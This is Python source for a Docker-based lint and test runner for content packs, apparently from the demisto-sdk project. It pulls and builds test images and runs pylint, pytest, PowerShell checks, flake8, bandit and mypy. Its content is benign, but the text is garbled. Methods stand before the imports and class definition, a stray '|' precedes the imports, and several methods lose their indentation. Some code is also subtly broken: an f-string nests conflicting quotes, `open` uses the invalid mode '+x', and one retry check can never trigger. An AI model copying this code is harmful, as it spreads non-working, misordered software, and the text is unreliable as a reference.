    def _run_lint_on_docker_image(self, no_pylint: bool, no_test: bool, no_pwsh_analyze: bool, no_pwsh_test: bool,
                                  keep_container: bool, test_xml: str):
        """ Run lint/test checks inside each of the pack's docker images.

        For every image: build a dev image (retried once), then run the applicable checks
        (pylint/pytest for python packs, analyze/test for powershell packs), each retried once
        on environment-related failures. Results are folded into self._pkg_lint_status.

        Args:
            no_pylint(bool): Whether to skip pylint
            no_test(bool): Whether to skip pytest
            no_pwsh_analyze(bool): Whether to skip powershell code analyzing
            no_pwsh_test(bool): Whether to skip powershell tests
            keep_container(bool): Whether to keep the test container
            test_xml(str): Path for saving pytest xml results
        """
        for image in self._facts["images"]:
            # Per-image status - used for result visualization
            status = {
                "image": image[0],
                "image_errors": "",
                "pylint_errors": "",
                "pytest_errors": "",
                "pytest_json": {},
                "pwsh_analyze_errors": "",
                "pwsh_test_errors": ""
            }
            # Build the dev image; image creation is retried once on errors
            image_id = ""
            errors = ""
            for trial in range(2):
                image_id, errors = self._docker_image_create(docker_base_image=image)
                if not errors:
                    break
            if image_id and not errors:
                # Image created - run each applicable check inside it
                for check in ["pylint", "pytest", "pwsh_analyze", "pwsh_test"]:
                    exit_code = SUCCESS
                    output = ""
                    for trial in range(2):
                        if self._pkg_lint_status["pack_type"] == TYPE_PYTHON:
                            # Perform pylint
                            if not no_pylint and check == "pylint" and self._facts["lint_files"]:
                                exit_code, output = self._docker_run_pylint(test_image=image_id,
                                                                            keep_container=keep_container)
                            # Perform pytest
                            elif not no_test and self._facts["test"] and check == "pytest":
                                exit_code, output, test_json = self._docker_run_pytest(test_image=image_id,
                                                                                       keep_container=keep_container,
                                                                                       test_xml=test_xml)
                                status["pytest_json"] = test_json
                        elif self._pkg_lint_status["pack_type"] == TYPE_PWSH:
                            # Perform powershell analyze
                            if not no_pwsh_analyze and check == "pwsh_analyze" and self._facts["lint_files"]:
                                exit_code, output = self._docker_run_pwsh_analyze(test_image=image_id,
                                                                                  keep_container=keep_container)
                            # Perform powershell test
                            elif not no_pwsh_test and check == "pwsh_test":
                                exit_code, output = self._docker_run_pwsh_test(test_image=image_id,
                                                                               keep_container=keep_container)
                        # A RERUN result (environment-related failure) is retried once;
                        # a RERUN on the second trial counts as a real failure.
                        if (exit_code == RERUN and trial == 1) or exit_code == FAIL or exit_code == SUCCESS:
                            if exit_code in [RERUN, FAIL]:
                                self._pkg_lint_status["exit_code"] |= EXIT_CODES[check]
                                status[f"{check}_errors"] = output
                            break
            else:
                # Image creation failed - record it against the "image" exit code
                status["image_errors"] = str(errors)
                self._pkg_lint_status["exit_code"] += EXIT_CODES["image"]
            # Add image status to images
            self._pkg_lint_status["images"].append(status)
            # Best-effort cleanup of the dev image
            try:
                self._docker_client.images.remove(image_id)
            except (docker.errors.ImageNotFound, docker.errors.APIError):
                pass
def _docker_login(self) -> bool:
""" Login to docker-hub using environment variables:
1. DOCKERHUB_USER - User for docker hub.
2. DOCKERHUB_PASSWORD - Password for docker-hub.
Used in Circle-CI for pushing into repo devtestdemisto
Returns:
bool: True if logged in successfully.
"""
docker_user = os.getenv('DOCKERHUB_USER')
docker_pass = os.getenv('DOCKERHUB_PASSWORD')
try:
self._docker_client.login(username=docker_user,
password=docker_pass,
registry="https://index.docker.io/v1")
return self._docker_client.ping()
except docker.errors.APIError:
return False
def _docker_image_create(self, docker_base_image: List[Any]) -> Tuple[str, str]:
""" Create docker image:
1. Installing 'build base' if required in alpine images version - https://wiki.alpinelinux.org/wiki/GCC
2. Installing pypi packs - if only pylint required - only pylint installed otherwise all pytest and pylint
installed, packages which being install can be found in path demisto_sdk/commands/lint/dev_envs
3. The docker image build done by Dockerfile template located in
demisto_sdk/commands/lint/templates/dockerfile.jinja2
Args:
docker_base_image(list): docker image to use as base for installing dev deps and python version.
Returns:
str, str. image name to use and errors string.
"""
log_prompt = f"{self._pack_name} - Image create"
test_image_id = ""
# Get requirements file for image
requirements = []
if 2 < docker_base_image[1] < 3:
requirements = self._req_2
elif docker_base_image[1] > 3:
requirements = self._req_3
# Using DockerFile template
file_loader = FileSystemLoader(Path(__file__).parent / 'templates')
env = Environment(loader=file_loader, lstrip_blocks=True, trim_blocks=True, autoescape=True)
template = env.get_template('dockerfile.jinja2')
try:
dockerfile = template.render(image=docker_base_image[0],
pypi_packs=requirements + self._facts["additional_requirements"],
pack_type=self._pkg_lint_status["pack_type"],
copy_pack=False)
except exceptions.TemplateError as e:
logger.debug(f"{log_prompt} - Error when build image - {e.message()}")
return test_image_id, str(e)
# Trying to pull image based on dockerfile hash, will check if something changed
errors = ""
test_image_name = f'devtest{docker_base_image[0]}-{hashlib.md5(dockerfile.encode('utf-8')).hexdigest()}'
test_image = None
try:
logger.info(f"{log_prompt} - Trying to pull existing image {test_image_name}")
test_image = self._docker_client.images.pull(test_image_name)
except (docker.errors.APIError, docker.errors.ImageNotFound):
logger.info(f"{log_prompt} - Unable to find image {test_image_name}")
# Creatng new image if existing image isn't found
if not test_image:
logger.info(
f"{log_prompt} - Creating image based on {docker_base_image[0]} - Could take 2-3 minutes at first "
f"time")
try:
with io.BytesIO() as f:
f.write(dockerfile.encode('utf-8'))
f.seek(0)
self._docker_client.images.build(fileobj=f,
tag=test_image_name,
forcerm=True)
if self._docker_hub_login:
for trial in range(2):
try:
self._docker_client.images.push(test_image_name)
logger.info(f"{log_prompt} - Image {test_image_name} pushed to repository")
break
except (requests.exceptions.ConnectionError, urllib3.exceptions.ReadTimeoutError):
logger.info(f"{log_prompt} - Unable to push image {test_image_name} to repository")
except (docker.errors.BuildError, docker.errors.APIError, Exception) as e:
logger.critical(f"{log_prompt} - Build errors occurred {e}")
errors = str(e)
else:
logger.info(f"{log_prompt} - Found existing image {test_image_name}")
dockerfile_path = Path(self._pack_abs_dir / ".Dockerfile")
dockerfile = template.render(image=test_image_name,
copy_pack=True)
with open(file=dockerfile_path, mode="+x") as file:
file.write(str(dockerfile))
# we only do retries in CI env where docker build is sometimes flacky
build_tries = int(os.getenv('DEMISTO_SDK_DOCKER_BUILD_TRIES', 3)) if os.getenv('CI') else 1
for trial in range(build_tries):
try:
logger.info(f"{log_prompt} - Copy pack dir to image {test_image_name}")
docker_image_final = self._docker_client.images.build(path=str(dockerfile_path.parent),
dockerfile=dockerfile_path.stem,
forcerm=True)
test_image_name = docker_image_final[0].short_id
break
except Exception as e:
logger.exception(f"{log_prompt} - errors occurred when building image in dir {e}")
if trial >= build_tries:
errors = str(e)
else:
logger.info(f"{log_prompt} - sleeping 2 seconds and will retry build after")
time.sleep(2)
if dockerfile_path.exists():
dockerfile_path.unlink()
if test_image_id:
logger.info(f"{log_prompt} - Image {test_image_id} created successfully")
return test_image_name, errors
def _docker_remove_container(self, container_name: str):
try:
container_obj = self._docker_client.containers.get(container_name)
container_obj.remove(force=True)
except docker.errors.NotFound:
pass
except requests.exceptions.ChunkedEncodingError as err:
# see: https://github.com/docker/docker-py/issues/2696#issuecomment-721322548
if platform.system() != 'Darwin' or 'Connection broken' not in str(err):
raise
    def _docker_run_pylint(self, test_image: str, keep_container: bool) -> Tuple[int, str]:
        """ Run Pylint in the created test image.

        Args:
            test_image(str): test image id/name
            keep_container(bool): True to keep the container after execution finished

        Returns:
            int: SUCCESS (0) on success, FAIL (1) on lint errors, RERUN (2) when a retry is needed
            str: Container log (lint findings) or the docker error
        """
        log_prompt = f'{self._pack_name} - Pylint - Image {test_image}'
        logger.info(f"{log_prompt} - Start")
        container_name = f"{self._pack_name}-pylint"
        # Remove any container left over from a previous run
        self._docker_remove_container(container_name)
        # Run container
        exit_code = SUCCESS
        output = ""
        try:
            container_obj: docker.models.containers.Container = self._docker_client.containers.run(
                name=container_name,
                image=test_image,
                command=[
                    build_pylint_command(
                        self._facts["lint_files"], docker_version=self._facts.get('python_version'))
                ],
                user=f"{os.getuid()}:4000",
                detach=True,
                environment=self._facts["env_vars"]
            )
            stream_docker_container_output(container_obj.logs(stream=True))
            # wait for container to finish
            container_status = container_obj.wait(condition="exited")
            # Get container exit code
            container_exit_code = container_status.get("StatusCode")
            # Getting container logs
            container_log = container_obj.logs().decode("utf-8")
            logger.info(f"{log_prompt} - exit-code: {container_exit_code}")
            # pylint exit codes are a bitmask; see pylint documentation
            if container_exit_code in [1, 2]:
                # 1-fatal message issued
                # 2-Error message issued
                exit_code = FAIL
                output = container_log
                logger.info(f"{log_prompt} - Finished errors found")
            elif container_exit_code in [4, 8, 16]:
                # 4-Warning message issued
                # 8-refactor message issued
                # 16-convention message issued
                logger.info(f"{log_prompt} - Successfully finished - warnings found")
                exit_code = SUCCESS
            elif container_exit_code == 32:
                # 32-usage error
                logger.critical(f"{log_prompt} - Finished - Usage error")
                exit_code = RERUN
            else:
                logger.info(f"{log_prompt} - Successfully finished")
            # Keep the container if requested, otherwise remove it
            if keep_container:
                print(f"{log_prompt} - container name {container_name}")
            else:
                try:
                    container_obj.remove(force=True)
                except docker.errors.NotFound as e:
                    logger.critical(f"{log_prompt} - Unable to delete container - {e}")
        except (docker.errors.ImageNotFound, docker.errors.APIError) as e:
            # Environment-level docker failure - signal the caller to retry
            logger.critical(f"{log_prompt} - Unable to run pylint - {e}")
            exit_code = RERUN
            output = str(e)
        return exit_code, output
    def _docker_run_pytest(self, test_image: str, keep_container: bool, test_xml: str) -> Tuple[int, str, dict]:
        """ Run Pytest in the created test image.

        Args:
            test_image(str): Test image id/name
            keep_container(bool): True to keep the container after execution finished
            test_xml(str): Directory in which to save the xml report ("" to skip)

        Returns:
            int: SUCCESS (0) on success, FAIL (1) on test errors, RERUN (2) when a retry is needed
            str: Container log on failure ("" otherwise)
            dict: Unit test json report (pytest json report, longrepr split into lines)
        """
        log_prompt = f'{self._pack_name} - Pytest - Image {test_image}'
        logger.info(f"{log_prompt} - Start")
        container_name = f"{self._pack_name}-pytest"
        # Remove any container left over from a previous run
        self._docker_remove_container(container_name)
        # Collect tests
        exit_code = SUCCESS
        output = ''
        test_json = {}
        try:
            # Running pytest container
            container_obj: docker.models.containers.Container = self._docker_client.containers.run(
                name=container_name,
                image=test_image,
                command=[build_pytest_command(test_xml=test_xml, json=True)],
                user=f"{os.getuid()}:4000",
                detach=True,
                environment=self._facts["env_vars"])
            stream_docker_container_output(container_obj.logs(stream=True))
            # Waiting for container to be finished
            container_status: dict = container_obj.wait(condition="exited")
            # Getting container exit code
            container_exit_code = container_status.get("StatusCode")
            # Getting container logs
            logger.info(f"{log_prompt} - exit-code: {container_exit_code}")
            if container_exit_code in [0, 1, 2, 5]:
                # 0-All tests passed
                # 1-Tests were collected and run but some of the tests failed
                # 2-Test execution was interrupted by the user
                # 5-No tests were collected
                if test_xml:
                    # Copy the xml report out of the container
                    test_data_xml = get_file_from_container(container_obj=container_obj,
                                                            container_path="/devwork/report_pytest.xml")
                    xml_apth = Path(test_xml) / f'{self._pack_name}_pytest.xml'
                    with open(file=xml_apth, mode='bw') as f:
                        f.write(test_data_xml)  # type: ignore
                # Copy the json report out of the container; split long tracebacks into line lists
                test_json = json.loads(get_file_from_container(container_obj=container_obj,
                                                               container_path="/devwork/report_pytest.json",
                                                               encoding="utf-8"))
                for test in test_json.get('report', {}).get("tests"):
                    if test.get("call", {}).get("longrepr"):
                        test["call"]["longrepr"] = test["call"]["longrepr"].split('\n')
                if container_exit_code in [0, 5]:
                    logger.info(f"{log_prompt} - Successfully finished")
                    exit_code = SUCCESS
                elif container_exit_code in [2]:
                    output = container_obj.logs().decode('utf-8')
                    exit_code = FAIL
                else:
                    logger.info(f"{log_prompt} - Finished errors found")
                    exit_code = FAIL
            elif container_exit_code in [3, 4]:
                # 3-Internal error happened while executing tests
                # 4-pytest command line usage error
                logger.critical(f"{log_prompt} - Usage error")
                exit_code = RERUN
                output = container_obj.logs().decode('utf-8')
            # Keep the container if requested, otherwise remove it
            if keep_container:
                print(f"{log_prompt} - Container name {container_name}")
            else:
                try:
                    container_obj.remove(force=True)
                except docker.errors.NotFound as e:
                    logger.critical(f"{log_prompt} - Unable to remove container {e}")
        except (docker.errors.ImageNotFound, docker.errors.APIError) as e:
            # Environment-level docker failure - signal the caller to retry
            logger.critical(f"{log_prompt} - Unable to run pytest container {e}")
            exit_code = RERUN
        return exit_code, output, test_json
def _docker_run_pwsh_analyze(self, test_image: str, keep_container: bool) -> Tuple[int, str]:
""" Run Powershell code analyze in created test image
Args:
test_image(str): test image id/name
keep_container(bool): True if to keep container after excution finished
Returns:
int: 0 on successful, errors 1, need to retry 2
str: Container log
"""
log_prompt = f'{self._pack_name} - Powershell analyze - Image {test_image}'
logger.info(f"{log_prompt} - Start")
container_name = f"{self._pack_name}-pwsh-analyze"
# Check if previous run left container a live if it do, we remove it
container_obj: docker.models.containers.Container
try:
container_obj = self._docker_client.containers.get(container_name)
container_obj.remove(force=True)
except docker.errors.NotFound:
pass
# Run container
exit_code = SUCCESS
output = ""
try:
container_obj = self._docker_client.containers.run(name=container_name,
image=test_image,
command=build_pwsh_analyze_command(
self._facts["lint_files"][0]),
user=f"{os.getuid()}:4000",
detach=True,
environment=self._facts["env_vars"])
stream_docker_container_output(container_obj.logs(stream=True))
# wait for container to finish
container_status = container_obj.wait(condition="exited")
# Get container exit code
container_exit_code = container_status.get("StatusCode")
# Getting container logs
container_log = container_obj.logs().decode("utf-8")
logger.info(f"{log_prompt} - exit-code: {container_exit_code}")
if container_exit_code:
# 1-fatal message issued
# 2-Error message issued
logger.info(f"{log_prompt} - Finished errors found")
output = container_log
exit_code = FAIL
else:
logger.info(f"{log_prompt} - Successfully finished")
# Keeping container if needed or remove it
if keep_container:
print(f"{log_prompt} - container name {container_name}")
else:
try:
container_obj.remove(force=True)
except docker.errors.NotFound as e:
logger.critical(f"{log_prompt} - Unable to delete container - {e}")
except (docker.errors.ImageNotFound, docker.errors.APIError) as e:
logger.critical(f"{log_prompt} - Unable to run powershell test - {e}")
exit_code = RERUN
return exit_code, output
def _update_support_level(self):
    """ Update self._facts['support_level'] from the pack's pack_metadata file.

    Resolves the pack root (one level up when the package sits directly in the
    integrations dir, two levels up otherwise), reads the metadata 'support'
    field, and upgrades 'partner' to 'certified partner' when a 'Certification'
    entry is present.
    """
    pack_dir = self._pack_abs_dir.parent if self._pack_abs_dir.parts[-1] == INTEGRATIONS_DIR else \
        self._pack_abs_dir.parent.parent
    # Open the metadata file with a context manager so the handle is closed
    # promptly (the previous code passed `path.open()` straight to json.load
    # and leaked the open file object).
    with (pack_dir / PACKS_PACK_META_FILE_NAME).open() as pack_meta_file:
        pack_meta_content: Dict = json.load(pack_meta_file)
    self._facts['support_level'] = pack_meta_content.get('support')
    if self._facts['support_level'] == 'partner' and pack_meta_content.get('Certification'):
        self._facts['support_level'] = 'certified partner'
def _docker_run_pwsh_test(self, test_image: str, keep_container: bool) -> Tuple[int, str]:
    """ Run Powershell tests in created test image

    Args:
        test_image(str): test image id/name
        keep_container(bool): True if to keep container after execution finished

    Returns:
        int: 0 on successful, errors 1, need to retry 2
        str: Container log
    """
    log_prompt = f'{self._pack_name} - Powershell test - Image {test_image}'
    logger.info(f"{log_prompt} - Start")
    container_name = f"{self._pack_name}-pwsh-test"
    # Remove any container left over from a previous (interrupted) run.
    self._docker_remove_container(container_name)
    # Run container detached so its log stream can be consumed while it runs.
    exit_code = SUCCESS
    output = ""
    try:
        container_obj: docker.models.containers.Container = self._docker_client.containers.run(name=container_name,
                                                                                               image=test_image,
                                                                                               command=build_pwsh_test_command(),
                                                                                               user=f"{os.getuid()}:4000",
                                                                                               detach=True,
                                                                                               environment=self._facts["env_vars"])
        stream_docker_container_output(container_obj.logs(stream=True))
        # wait for container to finish
        container_status = container_obj.wait(condition="exited")
        # Get container exit code
        container_exit_code = container_status.get("StatusCode")
        # Getting container logs
        container_log = container_obj.logs().decode("utf-8")
        logger.info(f"{log_prompt} - exit-code: {container_exit_code}")
        if container_exit_code:
            # Any non-zero exit code is treated as a test failure:
            # 1-fatal message issued
            # 2-Error message issued
            logger.info(f"{log_prompt} - Finished errors found")
            output = container_log
            exit_code = FAIL
        else:
            logger.info(f"{log_prompt} - Successfully finished")
        # Keeping container if needed or remove it
        if keep_container:
            print(f"{log_prompt} - container name {container_name}")
        else:
            try:
                container_obj.remove(force=True)
            except docker.errors.NotFound as e:
                logger.critical(f"{log_prompt} - Unable to delete container - {e}")
    except (docker.errors.ImageNotFound, docker.errors.APIError) as e:
        # Environment-level docker failure: signal the caller to retry (RERUN).
        logger.critical(f"{log_prompt} - Unable to run powershell test - {e}")
        exit_code = RERUN
    return exit_code, output
def _get_commands_list(self, script_obj: dict):
""" Get all commands from yml file of the pack
Args:
script_obj(dict): the script section of the yml file.
Returns:
list: list of all commands
"""
commands_list = []
try:
commands_obj = script_obj.get('commands', {})
for command in commands_obj:
commands_list.append(command.get('name', ''))
except Exception:
logger.debug("Failed getting the commands from the yml file")
return commands_list
| # STD python packages
import copy
import hashlib
import io
import json
import logging
import os
import platform
import time
import traceback
from copy import deepcopy
from typing import Any, Dict, List, Optional, Tuple
# 3-rd party packages
import docker
import docker.errors
import docker.models.containers
import requests.exceptions
import urllib3.exceptions
from demisto_sdk.commands.common.constants import (INTEGRATIONS_DIR,
PACKS_PACK_META_FILE_NAME,
TYPE_PWSH, TYPE_PYTHON)
# Local packages
from demisto_sdk.commands.common.tools import (get_all_docker_images,
run_command_os)
from demisto_sdk.commands.lint.commands_builder import (
build_bandit_command, build_flake8_command, build_mypy_command,
build_pwsh_analyze_command, build_pwsh_test_command, build_pylint_command,
build_pytest_command, build_vulture_command, build_xsoar_linter_command)
from demisto_sdk.commands.lint.helpers import (EXIT_CODES, FAIL, RERUN, RL,
SUCCESS, WARNING,
add_tmp_lint_files,
add_typing_module,
get_file_from_container,
get_python_version_from_image,
pylint_plugin,
split_warnings_errors,
stream_docker_container_output)
from jinja2 import Environment, FileSystemLoader, exceptions
from ruamel.yaml import YAML
from wcmatch.pathlib import NEGATE, Path
logger = logging.getLogger('demisto-sdk')
class Linter:
""" Linter used to activate lint command on single package
Attributes:
pack_dir(Path): Pack to run lint on.
content_repo(Path): Git repo object of content repo.
req_2(list): requirements for docker using python2.
req_3(list): requirements for docker using python3.
docker_engine(bool): Whether docker engine detected by docker-sdk.
"""
def __init__(self, pack_dir: Path, content_repo: Path, req_3: list, req_2: list, docker_engine: bool):
    """ Capture lint inputs and initialize the facts/status bookkeeping.

    Args:
        pack_dir(Path): Pack to run lint on.
        content_repo(Path): Git repo object of content repo.
        req_3(list): requirements for docker using python3.
        req_2(list): requirements for docker using python2.
        docker_engine(bool): Whether docker engine detected by docker-sdk.
    """
    self._req_3 = req_3
    self._req_2 = req_2
    self._content_repo = content_repo
    self._pack_abs_dir = pack_dir
    self._pack_name = None
    # A docker client (and hub login) is only created when an engine is available.
    if docker_engine:
        self._docker_client: docker.DockerClient = docker.from_env()
        self._docker_hub_login = self._docker_login()
    # Facts gathered regarding pack lint and test
    self._facts: Dict[str, Any] = dict(images=[],
                                       python_version=0,
                                       env_vars={},
                                       test=False,
                                       lint_files=[],
                                       support_level=None,
                                       is_long_running=False,
                                       lint_unittest_files=[],
                                       additional_requirements=[],
                                       docker_engine=docker_engine,
                                       is_script=False,
                                       commands=None)
    # Pack lint status object - visualize it (insertion order preserved).
    status_fields = [("pkg", None),
                     ("pack_type", None),
                     ("path", str(self._content_repo)),
                     ("errors", []),
                     ("images", []),
                     ("flake8_errors", None),
                     ("XSOAR_linter_errors", None),
                     ("bandit_errors", None),
                     ("mypy_errors", None),
                     ("vulture_errors", None),
                     ("flake8_warnings", None),
                     ("XSOAR_linter_warnings", None),
                     ("bandit_warnings", None),
                     ("mypy_warnings", None),
                     ("vulture_warnings", None),
                     ("exit_code", SUCCESS),
                     ("warning_code", SUCCESS)]
    self._pkg_lint_status: Dict = dict(status_fields)
def run_dev_packages(self, no_flake8: bool, no_bandit: bool, no_mypy: bool, no_pylint: bool, no_vulture: bool,
                     no_xsoar_linter: bool, no_pwsh_analyze: bool, no_pwsh_test: bool, no_test: bool, modules: dict,
                     keep_container: bool, test_xml: str) -> dict:
    """ Run lint and tests on single package
    Performing the follow:
        1. Run the lint on OS - flake8, bandit, mypy.
        2. Run in package docker - pylint, pytest.

    Args:
        no_flake8(bool): Whether to skip flake8
        no_bandit(bool): Whether to skip bandit
        no_mypy(bool): Whether to skip mypy
        no_vulture(bool): Whether to skip vulture
        no_pylint(bool): Whether to skip pylint
        no_xsoar_linter(bool): Whether to skip the XSOAR linter
        no_pwsh_analyze(bool): Whether to skip powershell code analyzing
        no_pwsh_test(bool): whether to skip powershell tests
        no_test(bool): Whether to skip pytest
        modules(dict): Mandatory modules to locate in pack path (CommonServerPython.py etc)
        keep_container(bool): Whether to keep the test container
        test_xml(str): Path for saving pytest xml results

    Returns:
        dict: lint and test status for the pack (self._pkg_lint_status)
    """
    # Gather information for lint check information
    skip = self._gather_facts(modules)
    # If not python pack - skip pack
    if skip:
        return self._pkg_lint_status
    try:
        # Locate mandatory files in pack path - for more info checkout the context manager LintFiles
        with add_tmp_lint_files(content_repo=self._content_repo,  # type: ignore
                                pack_path=self._pack_abs_dir,
                                lint_files=self._facts["lint_files"],
                                modules=modules,
                                pack_type=self._pkg_lint_status["pack_type"]):
            # Run lint check on host - flake8, bandit, mypy
            if self._pkg_lint_status["pack_type"] == TYPE_PYTHON:
                self._run_lint_in_host(no_flake8=no_flake8,
                                       no_bandit=no_bandit,
                                       no_mypy=no_mypy,
                                       no_vulture=no_vulture,
                                       no_xsoar_linter=no_xsoar_linter)
            # Run lint and test check on pack docker image
            if self._facts["docker_engine"]:
                self._run_lint_on_docker_image(no_pylint=no_pylint,
                                               no_test=no_test,
                                               no_pwsh_analyze=no_pwsh_analyze,
                                               no_pwsh_test=no_pwsh_test,
                                               keep_container=keep_container,
                                               test_xml=test_xml)
    except Exception as ex:
        # Any unexpected failure is recorded as a pack-level error and adds FAIL
        # to the pack exit code instead of crashing the whole lint run.
        err = f'{self._pack_abs_dir}: Unexpected fatal exception: {str(ex)}'
        logger.error(f"{err}. Traceback: {traceback.format_exc()}")
        self._pkg_lint_status["errors"].append(err)
        self._pkg_lint_status['exit_code'] += FAIL
    return self._pkg_lint_status
def _gather_facts(self, modules: dict) -> bool:
    """ Gathering facts about the package - python version, docker images, valid docker image, yml parsing

    Args:
        modules(dict): Test mandatory modules to be ignored in lint check

    Returns:
        bool: True when the pack should be skipped, False when lint should continue.
    """
    # Looking for pkg yaml
    yml_file: Optional[Path] = self._pack_abs_dir.glob([r'*.yaml', r'*.yml', r'!*unified*.yml'], flags=NEGATE)
    if not yml_file:
        logger.info(f"{self._pack_abs_dir} - Skipping no yaml file found {yml_file}")
        self._pkg_lint_status["errors"].append('Unable to find yml file in package')
        return True
    else:
        try:
            yml_file = next(yml_file)
        except StopIteration:
            return True
    # Get pack name
    self._pack_name = yml_file.stem
    log_prompt = f"{self._pack_name} - Facts"
    self._pkg_lint_status["pkg"] = yml_file.stem
    logger.info(f"{log_prompt} - Using yaml file {yml_file}")
    # Parsing pack yaml - in order to verify if check needed
    try:
        script_obj: Dict = {}
        yml_obj: Dict = YAML().load(yml_file)
        if isinstance(yml_obj, dict):
            # Integrations keep the script under a 'script' key; scripts are flat.
            script_obj = yml_obj.get('script', {}) if isinstance(yml_obj.get('script'), dict) else yml_obj
        self._facts['is_script'] = True if 'Scripts' in yml_file.parts else False
        self._facts['is_long_running'] = script_obj.get('longRunning')
        self._facts['commands'] = self._get_commands_list(script_obj)
        self._pkg_lint_status["pack_type"] = script_obj.get('type')
    except (FileNotFoundError, IOError, KeyError):
        self._pkg_lint_status["errors"].append('Unable to parse package yml')
        return True
    # return no check needed if not python pack
    if self._pkg_lint_status["pack_type"] not in (TYPE_PYTHON, TYPE_PWSH):
        logger.info(f"{log_prompt} - Skipping due to not Python, Powershell package - Pack is"
                    f" {self._pkg_lint_status['pack_type']}")
        return True
    # Docker images
    if self._facts["docker_engine"]:
        logger.info(f"{log_prompt} - Pulling docker images, can take up to 1-2 minutes if not exists locally ")
        self._facts["images"] = [[image, -1] for image in get_all_docker_images(script_obj=script_obj)]
        # Gather environment variables for docker execution
        self._facts["env_vars"] = {
            "CI": os.getenv("CI", False),
            "DEMISTO_LINT_UPDATE_CERTS": os.getenv('DEMISTO_LINT_UPDATE_CERTS', "yes")
        }
    lint_files = set()
    # Facts for python pack
    if self._pkg_lint_status["pack_type"] == TYPE_PYTHON:
        self._update_support_level()
        if self._facts["docker_engine"]:
            # Getting python version from docker image - verifying if not valid docker image configured
            for image in self._facts["images"]:
                py_num: float = get_python_version_from_image(image=image[0])
                image[1] = py_num
                logger.info(f"{self._pack_name} - Facts - {image[0]} - Python {py_num}")
                if not self._facts["python_version"]:
                    self._facts["python_version"] = py_num
            # Checking whether *test* files exist in the package
            self._facts["test"] = True if next(self._pack_abs_dir.glob([r'test_*.py', r'*_test.py']),
                                               None) else False
            if self._facts["test"]:
                logger.info(f"{log_prompt} - Tests found")
            else:
                logger.info(f"{log_prompt} - Tests not found")
            # Gather package requirements embedded in a test-requirements.txt file
            test_requirements = self._pack_abs_dir / 'test-requirements.txt'
            if test_requirements.exists():
                try:
                    additional_req = test_requirements.read_text(encoding='utf-8').strip().split('\n')
                    self._facts["additional_requirements"].extend(additional_req)
                    logger.info(f"{log_prompt} - Additional package Pypi packages found - {additional_req}")
                except (FileNotFoundError, IOError):
                    self._pkg_lint_status["errors"].append('Unable to parse test-requirements.txt in package')
        elif not self._facts["python_version"]:
            # get python version from yml
            pynum = 3.7 if (script_obj.get('subtype', 'python3') == 'python3') else 2.7
            self._facts["python_version"] = pynum
            logger.info(f"{log_prompt} - Using python version from yml: {pynum}")
        # Get lint files
        lint_files = set(self._pack_abs_dir.glob(["*.py", "!__init__.py", "!*.tmp"],
                                                 flags=NEGATE))
    # Facts for Powershell pack
    elif self._pkg_lint_status["pack_type"] == TYPE_PWSH:
        # Get lint files
        # Fix: the last pattern previously contained a stray trailing quote
        # ("demistomock.ps1'") and therefore never matched the demistomock.ps1 file.
        lint_files = set(
            self._pack_abs_dir.glob(["*.ps1", "!*Tests.ps1", "CommonServerPowerShell.ps1", "demistomock.ps1"],
                                    flags=NEGATE))
    # Add CommonServer to the lint checks
    if 'commonserver' in self._pack_abs_dir.name.lower():
        # Powershell
        if self._pkg_lint_status["pack_type"] == TYPE_PWSH:
            self._facts["lint_files"] = [Path(self._pack_abs_dir / 'CommonServerPowerShell.ps1')]
        # Python
        elif self._pkg_lint_status["pack_type"] == TYPE_PYTHON:
            self._facts["lint_files"] = [Path(self._pack_abs_dir / 'CommonServerPython.py')]
    else:
        # Drop the mandatory test modules copied into the pack from lint scope.
        test_modules = {self._pack_abs_dir / module.name for module in modules.keys()}
        lint_files = lint_files.difference(test_modules)
        self._facts["lint_files"] = list(lint_files)
    if self._facts["lint_files"]:
        for lint_file in self._facts["lint_files"]:
            logger.info(f"{log_prompt} - Lint file {lint_file}")
    else:
        logger.info(f"{log_prompt} - Lint files not found")
    self._split_lint_files()
    return False
def _split_lint_files(self):
""" Remove unit test files from _facts['lint_files'] and put into their own list _facts['lint_unittest_files']
This is because not all lints should be done on unittest files.
"""
lint_files_list = deepcopy(self._facts["lint_files"])
for lint_file in lint_files_list:
if lint_file.name.startswith('test_') or lint_file.name.endswith('_test.py'):
self._facts['lint_unittest_files'].append(lint_file)
self._facts["lint_files"].remove(lint_file)
def _run_lint_in_host(self, no_flake8: bool, no_bandit: bool, no_mypy: bool, no_vulture: bool,
                      no_xsoar_linter: bool):
    """ Run lint check on host

    Args:
        no_flake8(bool): Whether to skip flake8.
        no_bandit(bool): Whether to skip bandit.
        no_mypy(bool): Whether to skip mypy.
        no_vulture(bool): Whether to skip Vulture.
        no_xsoar_linter(bool): Whether to skip the XSOAR linter.
    """
    warning = []
    error = []
    other = []
    exit_code: int = 0
    for lint_check in ["flake8", "XSOAR_linter", "bandit", "mypy", "vulture"]:
        exit_code = SUCCESS
        output = ""
        # flake8 also covers unit-test files; the other checks only run on lint_files.
        if self._facts["lint_files"] or self._facts["lint_unittest_files"]:
            if lint_check == "flake8" and not no_flake8:
                flake8_lint_files = copy.deepcopy(self._facts["lint_files"])
                # if there are unittest.py then we would run flake8 on them too.
                if self._facts['lint_unittest_files']:
                    flake8_lint_files.extend(self._facts['lint_unittest_files'])
                exit_code, output = self._run_flake8(py_num=self._facts["python_version"], lint_files=flake8_lint_files)
        if self._facts["lint_files"]:
            if lint_check == "XSOAR_linter" and not no_xsoar_linter:
                exit_code, output = self._run_xsoar_linter(py_num=self._facts["python_version"],
                                                           lint_files=self._facts["lint_files"])
            elif lint_check == "bandit" and not no_bandit:
                exit_code, output = self._run_bandit(lint_files=self._facts["lint_files"])
            elif lint_check == "mypy" and not no_mypy:
                exit_code, output = self._run_mypy(py_num=self._facts["python_version"],
                                                   lint_files=self._facts["lint_files"])
            elif lint_check == "vulture" and not no_vulture:
                exit_code, output = self._run_vulture(py_num=self._facts["python_version"],
                                                      lint_files=self._facts["lint_files"])
        # check for any exit code other than 0
        if exit_code:
            error, warning, other = split_warnings_errors(output)
        if exit_code and warning:
            # Record warning bits separately from failure bits.
            self._pkg_lint_status["warning_code"] |= EXIT_CODES[lint_check]
            self._pkg_lint_status[f"{lint_check}_warnings"] = "\n".join(warning)
        if exit_code & FAIL:
            self._pkg_lint_status["exit_code"] |= EXIT_CODES[lint_check]
            # if the errors were extracted correctly (they start with E)
            if error:
                self._pkg_lint_status[f"{lint_check}_errors"] = "\n".join(error)
            # if there were errors but they do not start with E
            else:
                self._pkg_lint_status[f"{lint_check}_errors"] = "\n".join(other)
def _run_flake8(self, py_num: float, lint_files: List[Path]) -> Tuple[int, str]:
    """ Runs flake8 on the given files from the content repo root.

    Args:
        py_num(float): The python version in use
